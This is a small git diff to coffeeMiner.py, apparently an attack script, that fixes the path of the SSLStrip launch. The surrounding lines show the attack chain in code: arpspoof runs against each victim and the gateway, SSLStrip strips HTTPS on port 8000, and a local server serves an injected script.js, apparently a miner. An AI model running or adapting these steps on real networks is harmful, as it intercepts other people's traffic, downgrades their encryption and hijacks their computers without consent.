diff --git a/coffeeMiner.py b/coffeeMiner.py index 163eb18..9ad8b3f 100644 --- a/coffeeMiner.py +++ b/coffeeMiner.py @@ -41,7 +41,7 @@ for victim in victims: os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &") # run SSLStrip on port 8000 -os.system("python sslstrip.py -l 8000 &") +os.system("python sslstrip/sslstrip.py -l 8000 &") # start the http server for serving the script.js, in a new console os.system("xterm -hold -e 'python3 httpServer.py' &")